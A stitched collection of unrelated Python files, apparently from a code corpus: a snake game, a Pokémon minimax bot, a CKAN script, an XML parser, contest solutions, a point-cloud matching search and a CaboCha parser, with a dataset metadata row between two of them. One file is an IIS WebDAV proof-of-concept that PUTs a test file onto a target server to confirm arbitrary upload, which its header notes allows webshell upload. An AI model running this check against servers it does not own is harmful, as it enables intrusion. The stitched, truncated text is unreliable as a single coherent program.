    if Sn.lis[0].x==0 and Path[0].x==Xa-1 and Sn.lis[0].y == Path[0].y:
        Sn.dir="AR"
    elif Sn.lis[0].x==Xa-1 and Path[0].x==0 and Sn.lis[0].y == Path[0].y:
        Sn.dir="DW"
    elif Sn.lis[0].x == Path[0].x and Sn.lis[0].y == 0 and Path[0].y == Ya-1:
        Sn.dir="LF"
    elif Sn.lis[0].x == Path[0].x and Sn.lis[0].y == Ya-1 and Path[0].y == 0:
        Sn.dir="RG"
    elif Sn.lis[0].x > Path[0].x and Sn.lis[0].y == Path[0].y:
        Sn.dir="AR"
    elif Sn.lis[0].x < Path[0].x and Sn.lis[0].y == Path[0].y:
        Sn.dir="DW"
    elif Sn.lis[0].x == Path[0].x and Sn.lis[0].y > Path[0].y:
        Sn.dir="LF"
    elif Sn.lis[0].x == Path[0].x and Sn.lis[0].y < Path[0].y:
        Sn.dir="RG"
    if dele:
        Path.pop(0)
    pass
# Drawing constants: colors and cell geometry for the pygame board.
# NOTE(review): pygame expects RGB tuples, yet AZUL ("blue") is (255, 0, 0)
# and ROJO ("red") is (0, 0, 255) -- the names and channels look swapped;
# confirm against the intended on-screen colors.
NEGRO = (0, 0, 0)
BLANCO = (255, 255, 255)
VERDE = ( 0, 255, 0)
AZUL = (255, 0, 0)
ROJO = (0, 0, 255)
LARGO = 10    # cell width in pixels
ALTO = 10     # cell height in pixels
MARGEN = 0    # gap between cells in pixels
# Ngrid holds the NoD pathfinding nodes mirroring grid; filled below.
Ngrid = []
# NOTE(review): N appears unused after this point.
N=0
# Fill the board: each cell has a 60% chance of being empty (0) and a 40%
# chance of being a wall (3). `grid`, `Xa`, `Ya` and the NoD class are
# defined earlier in this file (outside this chunk) -- assumed; TODO confirm.
for fila in range(Xa):
    grid.append([])
    Ngrid.append([])
    for columna in range(Ya):
        m=randint(0,9)
        if m > 3:
            grid[fila].append(0)
        else:
            grid[fila].append(3)
        Ngrid[fila].append(NoD(fila,columna,grid[fila][columna]))
# Wire up the 4-neighbourhood of every node, wrapping around the edges so
# the board behaves as a torus. Each branch handles one edge/corner case.
for fila in range(Xa):
    for columna in range(Ya):
        if fila==0 and columna!=0 and columna!=Ya-1:
            Ngrid[fila][columna].Ve.append(Ngrid[Xa-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
        elif fila==Xa-1 and columna !=0 and columna!=Ya-1:
            Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[0][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
        elif columna==0 and fila!=0 and fila!=Xa-1:
            Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][Ya-1])
        elif columna==Ya-1 and fila!=0 and fila!=Xa-1:
            Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][0])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
        elif columna==0 and fila==0:
            Ngrid[fila][columna].Ve.append(Ngrid[Xa-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][Ya-1])
        elif columna==0 and fila==Xa-1:
            Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[0][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][Ya-1])
        elif columna==Ya-1 and fila==0:
            Ngrid[fila][columna].Ve.append(Ngrid[Xa-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][0])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
        elif columna==Ya-1 and fila==Xa-1:
            Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[0][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][0])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
        else:
            Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
            Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
# Six smoothing passes: any cell with 3+ wall neighbours becomes a wall,
# thickening wall clusters (cellular-automaton style).
for a in range (0,6):
    for fila in range(Xa):
        for columna in range(Ya):
            n=0
            for nodo in Ngrid[fila][columna].Ve:
                if nodo.Wal==3:
                    n+=1
            if n >= 3:
                Ngrid[fila][columna].Wal=3
                grid[fila][columna]=3
# Game setup: window, clock, snake, and the first food pellet (placed on the
# snake's own head so the AI immediately "eats" it and computes a real path).
Sn=Snake("VERDE")
pygame.init()
DIMENSION_VENTANA = [1200, 600]
pantalla = pygame.display.set_mode(DIMENSION_VENTANA)
pygame.display.set_caption("Snake")
hecho = False
com=Comida(Sn.lis[0].x,Sn.lis[0].y)
grid[com.x][com.y]=4
reloj = pygame.time.Clock()
# NOTE(review): time.clock() was removed in Python 3.8 -- this script only
# runs on Python <= 3.7 (time.perf_counter() is the usual replacement).
start = time.clock()
# -------- Main program loop -----------
path=[]
flag=True
while not hecho:
    # Input: quit, mouse paints a snake-coloured cell, arrow keys steer
    # (reversing straight into yourself is disallowed).
    for evento in pygame.event.get():
        if evento.type == pygame.QUIT:
            hecho = True
        elif evento.type == pygame.MOUSEBUTTONDOWN:
            pos = pygame.mouse.get_pos()
            columna = pos[0] // (LARGO + MARGEN)
            fila = pos[1] // (ALTO + MARGEN)
            grid[fila][columna] = 1
            print("Click ", pos, "Coordenadas de la reticula: ", fila, columna)
        elif evento.type == pygame.KEYDOWN:
            if evento.key == pygame.K_UP and Sn.dir!="DW":
                Sn.dir="AR"
            if evento.key== pygame.K_RIGHT and Sn.dir!="LF":
                Sn.dir="RG"
            if evento.key== pygame.K_DOWN and Sn.dir!="AR":
                Sn.dir="DW"
            if evento.key == pygame.K_LEFT and Sn.dir!="RG":
                Sn.dir="LF"
    # Render: cell value -> colour (0 empty, 1 snake, 2 path, 3 wall, 4 food).
    pantalla.fill(NEGRO)
    for fila in range(Xa):
        for columna in range(Ya):
            color = BLANCO
            if grid[fila][columna] == 1:
                color = VERDE
            if grid[fila][columna] == 2:
                color = ROJO
            if grid[fila][columna] == 3:
                color = NEGRO
            if grid[fila][columna] == 4:
                color = AZUL
            pygame.draw.rect(pantalla,
                             color,
                             [(MARGEN+LARGO) * columna + MARGEN,
                             (MARGEN+ALTO) * fila + MARGEN,LARGO,
                             ALTO])
    pa=Sn.lsn()
    # Clear previous snake/path marks; NOTE(review): the bare except hides
    # any real error here (e.g. path being None after a failed search).
    try:
        Sn.lim(grid)
        for Nod in path:
            grid[Nod.x][Nod.y]=0
    except:
        pass
    elapsed = (time.clock() - start)
    # Step the simulation (the first iteration only initialises state).
    if elapsed > 0.000001 or flag:
        if not flag:
            Sn.mov()
        flag=False
        start = time.clock()
        if pa[0].x==com.x and pa[0].y==com.y:
            # Food eaten: grow, then respawn food on a random empty cell and
            # keep retrying until A* yields a usable path to it (Ia2 raising
            # IndexError on an empty path rejects the candidate).
            Sn.comer()
            while True:
                Cx=randint(0,Xa-1)
                Cy=randint(0,Ya-1)
                if grid[Cx][Cy]==0:
                    com=Comida(Cx,Cy)
                    Ini=Ngrid[Sn.lis[0].x][Sn.lis[0].y]
                    Fin=Ngrid[com.x][com.y]
                    path=Ia(Ini,Fin)
                    try:
                        Ia2(Sn,path,False)
                        break
                    except:
                        pass
        # NOTE(review): par is assigned but never used.
        par=Sn.lsn()
        Sn.imp(grid)
        Ia2(Sn,path,True)
        for Nod in path:
            grid[Nod.x][Nod.y]=2
        grid[com.x][com.y]=4
    reloj.tick(60)
    pygame.display.flip()
pygame.quit()
import time
import asyncio
from poke_env.player import Player, RandomPlayer
from BattleNode import BattleTree
## Player object that utilizes a minimax algorithm + alpha beta pruning to attack
class MinimaxABPlayer(Player):
    """poke-env Player that chooses moves via minimax with alpha-beta pruning."""
    # NOTE(review): DEPTH is never read; the tree is generated with the
    # literal depth 4 below -- confirm which value is intended.
    DEPTH = 3
    def choose_move(self, battle):
        """Build a BattleTree for the current state and play the minimax move."""
        bt = BattleTree()
        bt.populateFromBattleState(battle)
        bt.generate(4, True)
        if battle.available_moves:
            # Search the generated tree for the best evaluated move.
            _, best_move = self.minimax(bt, float('-inf'), float('inf'), True)
            # The returned move may originate from a deeper ply (see the
            # note on minimax), so only play it if it is legal this turn.
            if(best_move in battle.available_moves):
                return self.create_order(best_move)
        # No usable attack: fall back to a random move/switch.
        return self.choose_random_move(battle)
    # Standard minimax with alpha-beta pruning over BattleTree nodes.
    def minimax(self, node, alpha, beta, maximizingPlayer):
        """Return (evaluation, move) for *node*.

        Leaves return their staticEval() and last_move. NOTE(review): inner
        nodes propagate the move returned by the recursive call -- i.e. a
        move from the deepest ply rather than the immediate child's move;
        confirm this is intended. Ties go to the latest child examined
        (>= / <= comparisons).
        """
        if(node.subnodes == []):
            return node.staticEval(), node.last_move
        if(maximizingPlayer):
            maxEval = float('-inf')
            maxMove = None
            for child in node.subnodes:
                currEval, currMove = self.minimax(child, alpha, beta, False)
                if (currEval >= maxEval):
                    maxEval = currEval
                    maxMove = currMove
                alpha = max(alpha, maxEval)
                if beta <= alpha:
                    break
            return maxEval, maxMove
        if(not maximizingPlayer):
            minEval = float('inf')
            minMove = None
            for child in node.subnodes:
                currEval, currMove = self.minimax(child, alpha, beta, True)
                if (currEval <= minEval):
                    minEval = currEval
                    minMove = currMove
                beta = min(beta, minEval)
                if beta <= alpha:
                    break
            return minEval, minMove
async def main():
    """Pit the minimax player against a random player for 100 battles and
    report the win count and wall-clock time."""
    start = time.time()
    random_player = RandomPlayer(
        battle_format = "gen8randombattle"
    )
    minimax_ab_player = MinimaxABPlayer(
        battle_format = "gen8randombattle"
    )
    await minimax_ab_player.battle_against(random_player, n_battles=100)
    print(
        "Minimax Alpha-Beta player won %d / 100 battles [this took %f seconds]"
        % (
            minimax_ab_player.n_won_battles, time.time() - start
        )
    )
if __name__ == '__main__':
    # asyncio.run() replaces the get_event_loop().run_until_complete()
    # pattern, which is deprecated since Python 3.10 and does not close
    # the event loop on exit.
    asyncio.run(main())
import os
import ckanapi
from dotenv import load_dotenv
# Load CKAN credentials from a local .env file into the environment.
load_dotenv()
MY_API_KEY = os.getenv("API_KEY")
ckan = ckanapi.RemoteCKAN('http://data.buspark.io', apikey=MY_API_KEY)
# One entry per dataset ("package"), each with its attached resources.
packages = ckan.action.current_package_list_with_resources()
for package in packages:
    print(f"Package Name: {package['name']}")
    print(f"Package ID: {package['id']}")
    print("Resources:")
    for resource in package['resources']:
        print(f"\tResource Name: {resource['name']}")
        print(f"\tResource ID: {resource['id']}")
print(f"\tResource ID: {resource['id']}")
#!/usr/bin/env python
# -*- coding:utf-8 -*-
'''
name: IIS WebDav
info: "开启了WebDav且配置不当可导致攻击者直接上传webshell,进而导致服务器被入侵控制。
level: 紧急
type: 任意文件上传
repair: 禁用 IIS 的 WebDAV 服务
'''
import socket,urllib2,time
from POC_Framework import POC
class myPOC(POC):
    # Single-target PoC: probe one IP/port for an IIS WebDAV unrestricted PUT.
    def check(self, ip, port, timeout=5):
        """Return True when /vultest.txt can be PUT and read back.

        Sends a raw HTTP PUT over a plain socket, then fetches the uploaded
        file via urllib2 and looks for the marker payload. Python 2 code
        (urllib2, str payload over the socket). Returns False on any error;
        implicitly returns None (falsy) when the server does not echo 'PUT'
        or the marker is absent.
        """
        try:
            socket.setdefaulttimeout(timeout)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:%d\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % (ip, port)
            s.send(flag)
            time.sleep(1)
            data = s.recv(1024)
            s.close()
            if 'PUT' in data:
                url = 'http://' + ip + ":" + str(port) + '/vultest.txt'
                request = urllib2.Request(url)
                res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
                if 'xxscan0' in res_html:
                    return True
        except:
            # NOTE(review): bare except keeps the scan best-effort, but it
            # also swallows KeyboardInterrupt/SystemExit.
            return False
if __name__ == "__main__":
    # Instantiate the PoC and let the framework's run() drive check().
    poc_runner = myPOC()
    poc_runner.run()
from usefulFunctions import *
"""
The tag class exposes the following attributes:
    - name: the name of the tag. For example, for the tag
      "<test att1="val1" att2="val2">something is written here</test>" it would be "test".
    - length: the length of the defining string. In the previous example the length
      would be 62 (the '>' and '<' are counted).
    - text: the text contained between two tags; it never contains an embedded tag.
      In our example it would be "something is written here".
    - attributes: a list of the attributes specified in the opening tag. Here it
      would be [[att1, val1], [att2, val2]].
    - inside: the raw string used to extract the nested tags. In our example it is
      "<test att1="val1" att2="val2">something is written here</test>".
    - tags: the list of tags embedded in this tag. Each time a tag is created, the
      recursive method getTags is called to fill this list, building the embedded
      tags until none remain (return -1). In our example there are no embedded
      tags, so the return would directly be -1.
    - level: the nesting depth. Level 1 is the body tag of the XML; each tag it
      contains is level 2, tags inside those are level 3, and so on. It determines
      the indentation used when formatting the JSON string.
Besides getTags, __init__ and __str__, two methods convert the tag into a
JSON-formatted string. The main one, formatNameAndAttributes, recursively formats
the name and attributes; it calls formatText when there are no embedded tags, or
recurses into the embedded tags otherwise.
"""
class tag():
    """One parsed XML tag; see the module docstring for attribute semantics."""
    def getTags(self, body, level):
        """Parse the first child tag of *body* at nesting depth *level*.

        Returns the new tag object, or -1 when *body* is empty, malformed
        or holds no further tag. getName/getAttributes/getText come from
        usefulFunctions.
        """
        if body == "":
            return(-1)
        if body[0] != '<':
            return(-1)
        tagName = getName(body)
        i = len(tagName) + 1
        # Skip spaces between the tag name and its attributes.
        while i < len(body) and body[i] == ' ':
            i += 1
        j = i
        # Find the end of the opening tag.
        # NOTE(review): the bound `len(body) - i` looks suspicious (plain
        # len(body) would be expected) -- confirm against long tags.
        while j < len(body) - i and body[j] != '>':
            j += 1
        if body[j] != '>':
            return(-1)
        tagAttributes = getAttributes(body, i, j)
        j += 1
        endingIndex = body.find('</' + tagName + '>')
        if endingIndex == -1:
            return (-1)
        # Self-closing <unique/> tags are not supported: they have no
        # closing tag, so this condition would have to change to allow them.
        tagText = getText(body[j:])
        tagBody = body[j + len(tagText):endingIndex]
        # +3 accounts for the '</', the '>' of the closing tag.
        tagLength = j + len(tagText) + len(tagBody) + len(tagName) + 3
        foundTag = tag(tagLength, tagText, tagName, tagAttributes, tagBody, level)
        return(foundTag)
    def __init__(self, length, text, name, attributes, inside, level):
        self.length = length
        self.text = text
        self.name = name
        self.attributes = attributes
        self.inside = inside
        self.level = level
        self.tags = []
        # Eagerly parse every direct child; the list ends with the -1
        # sentinel returned once no further tag is found.
        i = 0
        while i < len(self.inside):
            newTag = self.getTags(self.inside[i:],level + 1)
            self.tags.append(newTag)
            if newTag == -1:
                break
            i += newTag.length
    def formatText(self):
        """Format this tag's text for the JSON output (shape depends on
        whether the tag carries attributes and/or children)."""
        if len(self.attributes) == 0 and len(self.tags) == 0:
            return ('"' + self.text + '",\n')
        elif len(self.tags) == 0:
            return(((self.level + 1) * '\t') + '"#text": "' + self.text + '"\n' + self.level * '\t' + '},\n')
        else:
            return(((self.level + 1) * '\t') + '"#text": "' + self.text + '"\n')
    def formatNameAndAttributes(self):
        """Recursively render this tag (name, attributes, children) as a
        JSON-like string indented with tabs by nesting level."""
        jsonFormat = (self.level * '\t') + '"' + self.name + '": '
        if len(self.attributes) > 0 or len(self.tags) > 0:
            jsonFormat += '{\n'
        for elem in self.attributes:
            jsonFormat += self.level * '\t' +'\t"@' + elem[0] +'": ' + elem[1] + ',\n'
        if len(self.tags) == 0:
            jsonFormat += self.formatText()
        else:
            for elem in self.tags:
                if elem != -1:
                    jsonFormat += elem.formatNameAndAttributes()
            if self.text != "":
                jsonFormat += self.formatText()
            jsonFormat += self.level * '\t' + '},\n'
        return(jsonFormat)
    def __str__(self):
        toPrint = "length = " + str(self.length) + "\n\n"
        # BUGFIX: this line previously reassigned toPrint (=), silently
        # discarding the "length =" line above; it now appends (+=).
        toPrint += "level = " + str(self.level) + "\n\n"
        if len(self.text) > 0:
            toPrint += "text = "
            toPrint += self.text + "\n\n"
        else:
            toPrint += "No text.\n\n"
        toPrint += "name = "
        toPrint += self.name + "\n\n"
        if len(self.attributes) > 0:
            toPrint += "Attributes:" + '\n'
            i = 1
            for elem in self.attributes:
                toPrint += "name: " + elem[0] + " "
                toPrint += "value: " +elem[1] + "\n"
                i += 1
        else:
            toPrint += "No attributes."
        toPrint += "\n\n"
        toPrint += "Body:" + '\n'
        toPrint += self.inside + '\n\n'
        if len(self.tags) > 0:
            toPrint += "Embedded tags:" + '\n'
        if self.tags == -1:
            toPrint += "No embedded tags\n"
        else:
            for elem in self.tags:
                if elem != -1:
                    toPrint += elem.name + '\n'
        toPrint += '\n' + '--------------------------------------' + '\n'
        return(toPrint)
# 93 C - Switches: count on/off assignments of N switches that light every
# bulb; bulb m is lit when the number of "on" switches among S[m] has
# parity P[m]. Brute force over all 2**N subsets.
N,M = map(int,input().split())
K = []
S = []
for _ in range(M):
    s = list(map(int,input().split()))
    K.append(s[0])
    # Convert switch ids to 0-indexed.
    s = [i-1 for i in s]
    S.append(s[1:])
P = list(map(int,input().split()))
ans = 0
for i in range(1<<N):
    swiches = [0]*N
    for j in range(N):
        mask = 1<<j
        # Switch j is "on" in subset i.
        if i & mask != 0:
            swiches[j] = 1
        # Switch j stays "off".
        else:
            continue
    # Count the bulbs lit by this assignment.
    cnt_light = 0
    for m in range(M):
        cnt_swich = 0
        for s in S[m]:
            if swiches[s] == 1:
                cnt_swich += 1
        if cnt_swich%2 == P[m]:
            cnt_light += 1
    if cnt_light == M:
        ans += 1
print(ans)
import cv2 as cv
import numpy as np
import datetime
import os
import sys
from csv import writer
from parameters import \
model_path, scene_path, result_path, scene_compare_path
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.model_selection import cross_val_score
from skopt.space import Real, Integer
from skopt.utils import use_named_args
from skopt import gp_minimize
from skopt.plots import plot_convergence
import logging
#change to -1 für alle cores
cores_count = 5
def getModels(path):
    """Return the .ply model filenames in *path* carrying an ACTIVE_/AKTIVE_ prefix."""
    return [
        candidate for candidate in os.listdir(path)
        if candidate.endswith(".ply")
        and candidate.startswith(("ACTIVE_", "AKTIVE_"))
    ]
def getScenes(path):
    """Return the .ply scene filenames in *path* carrying an ACTIVE_/AKTIVE_ prefix."""
    return [
        candidate for candidate in os.listdir(path)
        if candidate.endswith(".ply")
        and candidate.startswith(("ACTIVE_", "AKTIVE_"))
    ]
def matching(python_parameters=[]):
    """Objective function for the parameter study: run one surface-matching
    pass with the given PPF parameters and return a scalar score (lower is
    better) combining translation and rotation error against the known pose.

    python_parameters holds, in order: relativeSamplingStep,
    relativeDistanceStep, numAngles, relativeSceneSampleStep,
    relativeSceneDistance -- the order must match the skopt search space
    in main(). NOTE(review): the mutable default argument is never mutated
    here; it is kept for interface compatibility with gp_minimize.
    """
    #################################################################
    # External Parameter input
    #################################################################
    relativeSamplingStep = float(python_parameters[0])
    relativeDistanceStep = float(python_parameters[1])
    numAngles = float(python_parameters[2])
    relativeSceneSampleStep = float(python_parameters[3])
    relativeSceneDistance = float(python_parameters[4])
    #################################################################
    # get Model .PLY Files from /Model with prefix (ACTIVE_)
    #################################################################
    #models = getModels(model_path)
    ### small hack reverse
    models = []
    models.append("ACTIVE_model_palette_n_100000_1.ply")
    #################################################################
    # get Scene .PLY Files from /Scene with prefix (ACTIVE_)
    #################################################################
    #scenes = getScenes(scene_path)
    ### small hack reverse
    scenes = []
    scenes.append("ACTIVE_scene_palette_n_10000.ply")
    # Number of Results used
    N = 50
    # numAngles == 0 selects OpenCV's default angle discretisation.
    if numAngles == 0:
        detector = cv.ppf_match_3d_PPF3DDetector(relativeSamplingStep, relativeDistanceStep)
    else:
        detector = cv.ppf_match_3d_PPF3DDetector(relativeSamplingStep, relativeDistanceStep, numAngles)
    for model in models:
        logging.info(f"\n\nTraining with model: {model}")
        for scene in scenes:
            logging.info(f"Training with scene: {scene}")
            logging.info(f"With Parameter: {python_parameters}")
            tick1 = cv.getTickCount()
            pc = cv.ppf_match_3d.loadPLYSimple(model_path + "/%s" % model, 1)
            tick2 = cv.getTickCount()
            modal_load_duration = (tick2 - tick1) / cv.getTickFrequency()
            #print("Modelloading complete in " + str(modal_load_duration) + "sec")
            tick1 = cv.getTickCount()
            detector.trainModel(pc)
            tick2 = cv.getTickCount()
            training_duration = (tick2 - tick1) / cv.getTickFrequency()
            #print("Training complete in " + str(training_duration) + "sec")
            tick1 = cv.getTickCount()
            pcTest = cv.ppf_match_3d.loadPLYSimple(scene_path + "/%s" % scene, 1)
            tick2 = cv.getTickCount()
            scene_load_duration = (tick2 - tick1) / cv.getTickFrequency()
            #print("Sceneloading complete in " + str(scene_load_duration) + "sec")
            tick1 = cv.getTickCount()
            results = detector.match(pcTest, relativeSceneSampleStep, relativeSceneDistance)
            tick2 = cv.getTickCount()
            matching_duration = (tick2 - tick1) / cv.getTickFrequency()
            #print("Matching complete in " + str(matching_duration) + "sec")
            # Refine the top-N candidate poses with ICP.
            icp = cv.ppf_match_3d_ICP(100)
            _, results = icp.registerModelToScene(pc, pcTest, results[:N])
            now = datetime.datetime.now()
            # sort by residual (best pose first)
            list(results).sort(key=lambda x: x.residual)
            # Look up the ground-truth pose file matching this scene.
            scene_name = scene[7:-4]
            scene_pose_name = scene_name + "_pose.txt"
            possible_scene_pose_files = os.listdir(scene_compare_path)
            if scene_pose_name in possible_scene_pose_files:
                scene_pose = scene_compare_path + "/" + scene_pose_name
                pose = np.loadtxt(scene_pose, comments="#", delimiter=" ", unpack=False)
                # Decompose the 4x4 pose into Euler angles (degrees) and translation.
                scene_rotation = pose[:-1, :-1]
                scene_rotation_y = np.rad2deg(-np.arcsin(scene_rotation[2, 0]))
                scene_rotation_x = np.rad2deg(np.arcsin(scene_rotation[2, 1])) / np.cos(np.deg2rad(scene_rotation_y))
                scene_rotation_z = np.rad2deg(np.arcsin(scene_rotation[1, 0])) / np.cos(np.deg2rad(scene_rotation_y))
                scene_translation = pose[:, -1][:-1]
                scene_translation_x = scene_translation[0]
                scene_translation_y = scene_translation[1]
                scene_translation_z = scene_translation[2]
            try:
                result = results[0]
                model_rotation = result.pose[:-1, :-1]
                model_rotation_y = np.rad2deg(-np.arcsin(model_rotation[2, 0]))
                model_rotation_x = np.rad2deg(np.arcsin(model_rotation[2, 1])) / np.cos(np.deg2rad(model_rotation_y))
                model_rotation_z = np.rad2deg(np.arcsin(model_rotation[1, 0])) / np.cos(np.deg2rad(model_rotation_y))
                model_translation = result.pose[:, -1][:-1]
                model_translation_x = model_translation[0]
                model_translation_y = model_translation[1]
                model_translation_z = model_translation[2]
                x_ax_dif = round(scene_rotation_x - model_rotation_x, 5)
                y_ax_dif = round(scene_rotation_y - model_rotation_y, 5)
                z_ax_dif = round(scene_rotation_z - model_rotation_z, 5)
                x_dif = round(model_translation_x - scene_translation_x, 5)
                y_dif = round(model_translation_y - scene_translation_y, 5)
                z_dif = round(model_translation_z - scene_translation_z, 5)
                rot_norm = round(np.linalg.norm([x_ax_dif, y_ax_dif, z_ax_dif]), 5)
                tra_norm = round(np.linalg.norm([x_dif, y_dif, z_dif]), 5)
                # Translation error dominates the score; rotation contributes less.
                calc_score = (tra_norm**4) + (rot_norm**2)
                print("Rotation Error: " + str(rot_norm) + "\tTranstation Error: " + str(tra_norm) +"\tScore: " + str(calc_score))
                logging.info("Rotation Error: " + str(rot_norm) + "\tTranstation Error: " + str(tra_norm) +"\tScore: " + str(calc_score))
            except Exception:
                # BUGFIX: was a bare except, which also trapped
                # KeyboardInterrupt/SystemExit. Any failure (no match, no
                # ground-truth pose, bad decomposition) yields a penalty score.
                rot_norm = "Error"
                tra_norm = "Error"
                calc_score = 99999999999999
            return calc_score
def main():
    """Run Bayesian optimisation (skopt.gp_minimize) over the five
    surface-matching parameters and report the best configuration found."""
    logging.basicConfig(filename='quick.log', encoding='utf-8', level=logging.INFO)
    # Search space; the order must match the positional unpacking in matching().
    space = [Real(0.015, 0.08, name='relativeSamplingStep_Range'),
             Real(0.03, 0.08, name='relativeDistanceStep_Range'),
             Integer(0, 25, name='numAngles_Range'),
             Real(0.3, 0.8, name='relativeSceneSampleSte_Range'),
             Real(0.03, 0.08, name='relativeSceneDistance_Range')]
    res_gp = gp_minimize(matching, space,
                         acq_optimizer="lbfgs", n_jobs=cores_count,
                         n_calls=1500, random_state=0)
    print("Best score=%.4f" % res_gp.fun)
    # BUGFIX: the labels previously named GradientBoosting hyper-parameters
    # (max_depth, learning_rate, ...) copied from a skopt example; they now
    # name the surface-matching parameters actually being optimised.
    print("""Best parameters:
    - relativeSamplingStep=%f
    - relativeDistanceStep=%.6f
    - numAngles=%d
    - relativeSceneSampleStep=%f
    - relativeSceneDistance=%f""" % (res_gp.x[0], res_gp.x[1],
                                     res_gp.x[2], res_gp.x[3],
                                     res_gp.x[4]))
    plot_convergence(res_gp)
if __name__ == "__main__":
    # Script entry point: run the whole parameter study.
    main()
n, p = map(int,input().split())
a=list(map(int, input().split()))
# Counts of odd and even values in the input (filled by the loop below).
odd=0
even=0
nCr = {}

def cmb(n, r):
    """Binomial coefficient C(n, r), memoised in the module-level nCr dict
    via Pascal's rule."""
    if r == 0 or r == n:
        return 1
    if r == 1:
        return n
    key = (n, r)
    if key not in nCr:
        nCr[key] = cmb(n - 1, r) + cmb(n - 1, r - 1)
    return nCr[key]
# Tally the parity of each input value.
for i in a:
    if i%2==0:
        even+=1
    else:
        odd+=1
# Subsets of the odd values: sizes start at p and step by 2 (so the size's
# parity matches p), each contributing C(odd, size) choices.
o_pattern=0
for i in range(p,odd+1,2):
    o_pattern += cmb(odd,i)
# Even values do not affect parity, so any subset of them is allowed.
e_pattern=0
for i in range(even+1):
    e_pattern += cmb(even,i)
print(o_pattern*e_pattern) | Aasthaengg/IBMdataset | Python_codes/p03665/s070572627.py | s070572627.py | py | 495 | python | en | code | 0 | github-code | 90 |
class Morph:
    """One morpheme from a CaboCha token line (surface form, base form,
    part of speech and its subtype)."""

    def __init__(self, dc):
        # Copy the four expected fields; raises KeyError on a malformed record.
        for field in ('surface', 'base', 'pos', 'pos1'):
            setattr(self, field, dc[field])
class Chunk:
    """A CaboCha phrase: its morphemes, the chunk it depends on, and the
    chunks depending on it."""

    def __init__(self, morph_list, dst):
        self.morph_list = morph_list  # Morph objects making up this chunk
        self.dst = dst                # index (as a string) of the dependency target
        self.srcs = []                # indices of chunks pointing at this one
def read_cabocha(sentence):
    """Parse one CaboCha-annotated sentence into a list of Chunk objects.

    Lines starting with '*' open a new chunk (their third space-separated
    field, e.g. '5D', is the dependency target); all other non-empty lines
    are tab/comma-separated morpheme records. Finally each chunk's index is
    registered in its target's `srcs` list.
    """
    def append_chunk(morph_list):
        # Flush the accumulated morphemes into a Chunk (no-op when empty).
        if len(morph_list) > 0:
            chunk = Chunk(morph_list, dst)
            chunk_list.append(chunk)
            morph_list = []
        return morph_list
    morph_list = []
    chunk_list = []
    dst = None
    for line in sentence.split('\n'):
        if line == '':
            morph_list = append_chunk(morph_list)
        elif line[0] == '*':
            morph_list = append_chunk(morph_list)
            dst = line.split(' ')[2].rstrip('D')
        else:
            (surface, attr) = line.split('\t')
            attr = attr.split(',')
            lineDict = {
                'surface': surface,
                'base': attr[6],
                'pos': attr[0],
                'pos1': attr[1]
            }
            morph_list.append(Morph(lineDict))
    # Register reverse dependencies. NOTE(review): a root chunk (dst == -1)
    # appends its index to chunk_list[-1] (the last chunk) via negative
    # indexing -- confirm that downstream code tolerates this.
    for i, r in enumerate(chunk_list):
        chunk_list[int(r.dst)].srcs.append(i)
    return chunk_list
# Parse every sentence of the CaboCha output file into chunk lists.
with open("ai.ja.txt.parsed") as f:
    sentence_list = f.read().split('EOS\n')
sentence_list = list(filter(lambda x: x != '', sentence_list))
sentence_list = [read_cabocha(sentence) for sentence in sentence_list]
# For every chunk containing a noun, print its dependency path to the root.
for sentence in sentence_list:
    for chunk in sentence:
        text = []
        if '名詞' in [s.pos for s in chunk.morph_list] and int(chunk.dst) != -1:
            current_chunk = chunk
            # `chunk` is reused as the comprehension variable below; safe in
            # Python 3 because comprehensions have their own scope.
            text.append(''.join([chunk.surface for chunk in current_chunk.morph_list]))
            next_chunk = sentence[int(current_chunk.dst)]
            while int(current_chunk.dst) != -1:
                text.append(''.join([chunk.surface for chunk in next_chunk.morph_list]))
                current_chunk = next_chunk
                next_chunk = sentence[int(next_chunk.dst)]
            print(*text, sep=' -> ')
"""
人工知能 -> 語。 -> 研究分野」とも -> される。
(じんこうちのう、、 -> 語。 -> 研究分野」とも -> される。
AI -> 〈エーアイ〉)とは、 -> 語。 -> 研究分野」とも -> される。
〈エーアイ〉)とは、 -> 語。 -> 研究分野」とも -> される。
